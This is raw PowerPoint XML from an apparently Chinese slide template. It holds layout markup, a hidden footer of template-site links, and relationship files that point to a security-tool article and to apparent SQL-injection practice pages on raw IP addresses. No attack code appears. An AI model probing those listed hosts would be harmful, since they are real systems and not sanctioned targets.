            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19375235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ABA966C-C914-4B89-ADB0-BC6EB0177048}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35938985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ABA966C-C914-4B89-ADB0-BC6EB0177048}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22211018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ABA966C-C914-4B89-ADB0-BC6EB0177048}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35248063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ABA966C-C914-4B89-ADB0-BC6EB0177048}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39785558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3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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8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1452505932"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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9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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8325228" y="6545425"/>
            <a:ext cx="775136" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>优秀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="100" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2874945780"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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4179030245"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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105411750"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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2491624563"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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2117204580"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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1443702263"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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2192162830"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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1599471296"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">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7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2704117148"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">
        <p:random/>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50326F34-6995-4006-A62B-5661ADD477A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="组合 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67F08B3-23E9-41AD-9A46-4FF310D2B4E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="图片 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEAA73AA-335D-40C8-9488-B0914B5C5466}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId13" cstate="screen">
                <a:extLst>
                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:srcRect l="4925" r="7517"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="图片 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F0D825-6134-46DE-A085-A9241364857E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId13" cstate="screen">
                <a:extLst>
                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:srcRect l="4925" r="7517"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="图片 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C530E75C-07B3-4874-8EB8-89D8A13E4B14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId13" cstate="screen">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="4925" r="7517"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4962505-3AC2-453B-A1EA-33976100B1E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId13" cstate="screen">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="4925" r="7517"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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3500" advClick="0" advTm="3000">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advClick="0" advTm="3000">
        <p:random/>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5.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4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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/sectool/164608.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://43.247.91.228:81/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.106.211.30:8888/sqli/id.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide55.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.106.211.30:8888/sqli/search.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.106.211.30:8888/sqli/num.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.106.211.30:8888/sqli/string.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://43.247.91.228:84/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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 name="矩形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A2A171-6E7F-45EC-8D2E-4259908E2377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5304895" y="585480"/>
            <a:ext cx="1582208" cy="485668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2D4AA"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AD7DCC4-C9FE-4246-9714-98D64FD1DD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F20E5B-BB01-4781-BF29-B1C916D06F86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="图片 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
